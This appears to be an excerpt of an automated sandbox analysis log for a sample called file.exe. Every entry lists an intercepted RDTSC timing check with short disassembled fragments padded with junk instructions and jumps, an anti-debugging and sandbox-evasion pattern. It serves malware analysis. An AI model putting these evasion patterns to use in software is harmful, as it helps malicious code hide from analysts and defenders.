                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0439 second address: 8F043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F761B second address: 8F763A instructions: 0x00000000 rdtsc 0x00000002 js 00007FF17CC823A6h 0x00000008 jmp 00007FF17CC823AFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F763A second address: 8F7655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CBED4F4h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F99E6 second address: 8F99FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CC823B2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845F19 second address: 845F1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845F1E second address: 845F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CC823ABh 0x00000009 jmp 00007FF17CC823B0h 0x0000000e popad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC9CF second address: 8FC9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC9D7 second address: 8FC9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC9E0 second address: 8FC9F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC9F2 second address: 8FC9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC9F6 second address: 8FCA1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007FF17CBED4EFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FCA1B second address: 8FCA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 jmp 00007FF17CC823B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FCA3A second address: 8FCA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908E52 second address: 908E6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FF17CC823B0h 0x00000010 jmp 00007FF17CC823AAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB95 second address: 90DBA2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF17CBED4E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DBA2 second address: 90DBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DBA8 second address: 90DBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DBAD second address: 90DBBB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007FF17CC823A6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DBBB second address: 90DBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D5DD second address: 90D5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CC823B4h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D5F6 second address: 90D5FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D5FB second address: 90D601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D601 second address: 90D607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 919A74 second address: 919A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C983 second address: 91C987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C987 second address: 91C990 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C990 second address: 91C9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FF17CBED4EEh 0x0000000e jng 00007FF17CBED4E6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83F303 second address: 83F339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 jmp 00007FF17CC823B5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF17CC823B4h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83F339 second address: 83F34F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF17CBED4EDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924A32 second address: 924A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FF17CC823A6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924EA0 second address: 924EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924EA9 second address: 924EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92518C second address: 9251A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF17CBED4F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9252FF second address: 925305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925E1B second address: 925E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925E1F second address: 925E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF17CC823B3h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929726 second address: 929749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF17CBED4E6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pop ecx 0x0000000e ja 00007FF17CBED50Ch 0x00000014 jnp 00007FF17CBED4ECh 0x0000001a jnl 00007FF17CBED4E6h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929749 second address: 929755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF17CC823A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D4D8 second address: 92D4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF17CBED4E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FF17CBED4E6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D4ED second address: 92D548 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF17CC823B0h 0x00000010 pushad 0x00000011 jmp 00007FF17CC823B3h 0x00000016 jmp 00007FF17CC823AFh 0x0000001b ja 00007FF17CC823A6h 0x00000021 jmp 00007FF17CC823B6h 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D548 second address: 92D565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF17CBED4F7h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D565 second address: 92D577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D577 second address: 92D57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931450 second address: 931459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931459 second address: 93145D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93145D second address: 931461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931461 second address: 93146B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93146B second address: 931475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF17CC823A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931278 second address: 93127C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93127C second address: 931286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931286 second address: 93128C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93128C second address: 931290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931290 second address: 93129A instructions: 0x00000000 rdtsc 0x00000002 js 00007FF17CBED4E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93129A second address: 9312A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9312A0 second address: 9312A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9312A4 second address: 9312CC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF17CC823A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d js 00007FF17CC823A6h 0x00000013 jns 00007FF17CC823A6h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF17CC823AAh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9312CC second address: 9312D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937CBA second address: 937CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947027 second address: 94702D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946EAA second address: 946EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B8h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949C24 second address: 949C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EFh 0x00000007 js 00007FF17CBED4E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007FF17CBED4E8h 0x00000015 popad 0x00000016 push edx 0x00000017 push edx 0x00000018 jmp 00007FF17CBED4EDh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949950 second address: 949954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949954 second address: 949963 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF17CBED4E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949963 second address: 94996B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94996B second address: 949970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95FF85 second address: 95FFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jp 00007FF17CC823A6h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF17CC823AFh 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95FFA5 second address: 95FFAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95FFAA second address: 95FFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CC823B2h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95FFC7 second address: 95FFF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FF17CBED4EBh 0x0000000f jmp 00007FF17CBED4EFh 0x00000014 jnl 00007FF17CBED4E6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95FFF3 second address: 960014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF17CC823B2h 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF17CC823A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960014 second address: 960018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9608B6 second address: 9608C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF17CC823A6h 0x0000000a pop edx 0x0000000b je 00007FF17CC823ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9608C9 second address: 9608CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9608CD second address: 9608D9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF17CC823AEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960A71 second address: 960A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FF17CBED4E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960A85 second address: 960A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960A8A second address: 960A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960A8F second address: 960AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FF17CC823A6h 0x0000000d jng 00007FF17CC823A6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960D78 second address: 960D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960D7C second address: 960D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FF17CC823A6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960D8A second address: 960D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960EEC second address: 960EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960EF6 second address: 960EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960EFC second address: 960F02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960F02 second address: 960F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962844 second address: 962848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967D41 second address: 967D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967D47 second address: 967D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967D4B second address: 967D7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FF17CBED4F7h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96808D second address: 968091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9682BB second address: 968303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or dword ptr [ebp+12478A79h], edi 0x00000012 push dword ptr [ebp+12462F42h] 0x00000018 sbb edx, 77C8C1DFh 0x0000001e call 00007FF17CBED4E9h 0x00000023 pushad 0x00000024 jbe 00007FF17CBED4E8h 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968303 second address: 968307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968307 second address: 968314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968314 second address: 96831F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF17CC823A6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96831F second address: 96834B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF17CBED4E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnp 00007FF17CBED4F0h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jp 00007FF17CBED4F8h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96834B second address: 96834F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96834F second address: 968353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96975D second address: 96976D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF17CC823A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96976D second address: 96979E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jnc 00007FF17CBED508h 0x0000000f rdtsc
